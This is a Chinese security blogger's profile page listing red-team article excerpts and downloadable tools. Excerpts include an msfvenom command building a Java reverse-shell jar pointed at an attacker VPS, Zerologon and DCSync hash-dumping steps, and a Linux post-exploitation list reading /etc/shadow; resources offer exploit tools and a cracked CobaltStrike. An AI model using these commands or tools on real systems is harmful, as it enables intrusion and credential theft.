自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

谢公子的博客

一个小帅哥,热爱技术。很努力、很自信、很优秀

  • 博客(15)
  • 资源 (19)
  • 论坛 (1)
  • 收藏
  • 关注

原创 Vmware虚拟化

在红蓝对抗过程中,在内网中经常会碰到Vmware相关的产品。如:VMware ESXi登录 vRealize Operations Manager Login | Appliance Management vSphere Web Client相关文章:安装ESXi

2020-10-27 09:16:42 895

原创 Apache Flink任意Jar包上传getshell

Apache FlinkApache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行msfvenom -p java/shell_reverse_tcp LHOST=VPS的ip地址 LPORT=34567 -f jar > test.jar漏洞描述近日,有安全研

2020-10-27 08:28:29 979

原创 解除445端口的占用

有很多时候,我们测试的时候,会需要用到445端口。而windows默认该端口是开放的,那么我们如何关闭该端口的占用状态呢?不是通过防火墙阻止445端口的连接来关闭,这种是阻止外部连接,但是本地445端口还是开放的。我们这里讲的是关闭占用445端口的服务!关闭Server服务打开cmd,执行:services.msc打开服务窗口然后重启机器就可以看到445端口已经没有占用了。...

2020-10-18 22:35:39 1112 1

原创 域中的组策略(Group Policy)

组策略 组策略是Windows环境下用户管理对象的一种手段。组策略分为本地组策略和组策略。本地组策略适合于管理独立的未加入域的工作组的机器。而组策略则是用于管理域环境中的对象;本文主要讲解域环境中的组策略。关于本地组策略,传送门: 域环境中通过配置组策略可以对域中的用户、用户组、计算机进行不同维度的管理;如安全配置、注册表配置、软件安装配置、开关机与登入登出管理等。配置的组策略通过关联到站点、域、组织单位上来在不同层级上应用不同的策略配置。组策略配置分为两部分,分别是计算机配置和...

2020-10-13 10:36:37 1195 1

原创 CVE-2020-1472NetLogon权限提升漏洞

目录impacket攻击挂socks5代理打使用mimikatz攻击恢复域控的机器用户哈希获得域控机器账号原始哈希方式一 :方式二:恢复域控原始哈希impacket攻击先执行如下命令判断域控是否存在该漏洞python3 zerologon_tester.py win2008 192.168.10.131该脚本会将域控的机器账号哈希置为空#查询域控的机器用户哈希./secretsdump.py xie.com/administrator:p..

2020-10-12 16:21:06 1345

原创 Windows中的ACL(Access Control List))

ACL访问控制列表ACL(Access Control List)是Windows环境中访问控制模型的重点,用来表示用户(组)权限的列表。ACL微软官方文档:https://docs.microsoft.com/en-us/windows/desktop/SecAuthZ/access-control-lists简单来说,访问控制是指某主体(subject)允许或不被允许对某实体(object)执行读取、写入、删除、更改等操作。在Windows中,subject通常是进程,object是指安全对

2020-10-12 11:06:44 887

原创 配置夜神模拟器抓包

在渗透测试中,经常会碰到需要测试app的情况。用手机测试则会很不方便,所以我们一般都会用模拟器来安装app测试。这里我们使用的是夜伸模拟器。安装好夜伸模拟器后,我们如何配置模拟器,使burp能抓取到模拟器内app的数据包呢?burp配置首先,配置burp,这里先用ipconfig查看当前的ip地址(wifi或网线的地址),然后配置完成即可模拟器配置我们打开设置——>WLAN,然后长按WiredSSID——>修改网络高级选项——>代理——>手动

2020-10-10 22:34:16 2371 4

原创 域渗透之Dcsync

在DCSync功能出现之前,要想获得域用户的哈希,需要登录域控制器,在域控制器上执行代码才能获得域用户的哈希。2015年8月,新版的mimikatz增加了DCSync的功能,该功能可以模仿一个域控DC,从真实的域控中请求数据,如用户的哈希。该功能最大的特点就是可以实现不登录到域控而获取域控上的数据。在域中,不同的DC之间,每隔15分钟会进行一次域数据的同步。当一个DC(辅助DC)想从其他DC(主DC)获取数据时,辅助DC会向主DC发起一个GetNCChanges请求。请求的数据包括需要同步的数据。如果需

2020-10-09 23:49:17 1077

原创 后渗透之Linux信息收集

whoami #查看当前用户身份uname -a #查看系统信息history #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等last #查看登录历史cat /etc/passwd #查看用户cat /etc/shadow #查看密码traceroute baidu.comcat /etc/hosts #查看hosts文件cat /etc/resolv.conf #查看dns信息...

2020-10-09 15:36:32 1207 1

原创 WindowsServer2008R2安装Exchange Server2010

首先,Windows Server2008R2需要加入域环境中,我这里Windows Server 2008R2就是域控,在域控上安装Exchange服务。以管理员权限打开PowerShell,执行以下命令import-Module ServerManagerAdd-WindowsFeature NET-Framework,RSAT-ADDS,Web-Server,Web-Basic-Auth,Web-Windows-Auth,Web-Metabase,Web-Net-Ext,Web-Lgcy

2020-10-08 20:54:13 852

原创 域环境修改密码策略

管理工具——>组策略管理

2020-10-08 16:38:04 806 1

原创 Web开发介绍

如今,网站变得越来越流行。无论是大公司还是小公司,或者是提供其他服务的公司,都有自己的网站。随着网站的流行,开发网站的技术也犹如春笋一般涌起。所以,我特意总结了下网站开发的一些技术。网站开发可分为前端开发和后端开发。前端主要包括:HTML 、CSS 、JavaScript技术。基于JavaScript的框架包:jQuery:JavaScript包,它封装JavaScript常用的...

2020-10-06 22:56:11 908

原创 Python中的PIL库

PIL/PillowPIL(Python Image Library)是Python的第三方图像处理库,功能强大,使用人数众多。PIL历史悠久,原来是只支持 python2.x 的版本,后来出现了移植到python3的库Pillow,其功能和PIL差不多,但是支持python3。PIL和Pillow的调用都是 import PIL。所以,以下Pillow称为PIL,因为我的环境是pytho...

2020-10-06 22:54:33 964

转载 python3中的协程

在python GIL之下,同一时刻只能有一个线程在运行,那么对于CPU计算密集的程序来说,线程之间的切换开销就成了拖累,而以I/O为瓶颈的程序正是协程所擅长的。协程,又称为微线程,它是实现多任务的另一种方式,只不过是比线程更小的执行单元。因为它自带CPU的上下文,这样只要在合适的时机,我们可以把一个协程切换到另一个协程。通俗的理解:在一个线程中的某个函数中,我们可以在任何地方保存当前函数的一些临时变量等信息,然后切换到另外一个函数中执行,注意不是通过调用函数的方式做到的,并且切换的次数以及什...

2020-10-06 22:53:12 926

原创 python3中解析json的模块

json模块是python中用来解析json数据格式的模块。json中有两种数据结构:对象和数组。对象:用大括号表示,由键值对组成,每个键值对用逗号隔开。其中key必须为字符串且是双引号,value可以是多种数据类型。 数组:用中括号表示,每个元素之间用逗号隔开。json中的字符串都要用双括号表示,json数据可以嵌套出结构更加复杂的数据。函数 描述 json.dumps 将 Python 对象编码成 JSON 字符串 json.loads 将已编码的 JSON

2020-10-06 19:05:43 868

通达OA2017;通达OA2017

通达OA2017;通达OA2017

2021-01-03

CVE-2017-12615-master.zip

CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;

2019-09-04

oracle11.2安装包.zip

oracle11.2安装包.zip

2020-03-05

Scrapy依赖包.zip

Scrapy的依赖包

2019-12-31

platform-tools.zip

ADB调试工具;ADB调试工具;ADB调试工具;ADB调试工具;

2019-09-10

NTLM2(工作组).pcapng

NTLMv2数据包

2019-09-09

安卓反编译三件套.zip

安卓反编译三件套(apktools/dex2jar/jd-gui)。安卓反编译三件套(apktools/dex2jar/jd-gui)。

2019-09-09

icmp命令控制和隧道工具.zip

icmp命令控制和隧道工具;

2019-08-23

Fast Reverse Proxy.zip

FRP一款好用的内网穿透工具;FRP一款好用的内网穿透工具;

2019-08-12

Metasploit.zip

Metasploit安装包

2019-08-11

shiro反序列化复现.zip

shiro反序列化复现工具包;shiro反序列化复现工具包;

2019-08-03

ysoserial-0.0.6-SNAPSHOT-all.jar

ysoserial-0.0.6-SNAPSHOT-all.jar;

2019-08-03

Java反序列化工具.zip

java反序列化工具;weblogic反序列化工具;jboss反序列化工具。

2019-05-31

python打印变换特定字符

Python打印变换特定字符,Python2和Python3皆可用!

2019-04-30

CobaltStrike

CobaltStrike破解版;

2019-04-26

手机号码归属地查询

全国手机号码归属地查询,全国手机号码归属地查询,全国手机号码归属地查询

2019-04-16

CVE-2017-12615利用脚本

CVE-2017-12615利用脚本;tomcat服务器PUT上传导致命令执行。

2019-04-16

Struts2漏洞检查工具

struts2检查和利用工具!

2019-02-14

jboss-CVE-2017-12149

Jboss反序列化漏洞利用工具,CVE-2017-12149。Jboss反序列化漏洞利用工具,CVE-2017-12149。

2019-01-22

谢公子的留言板

发表于 2020-01-02 最后回复 2020-08-08

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除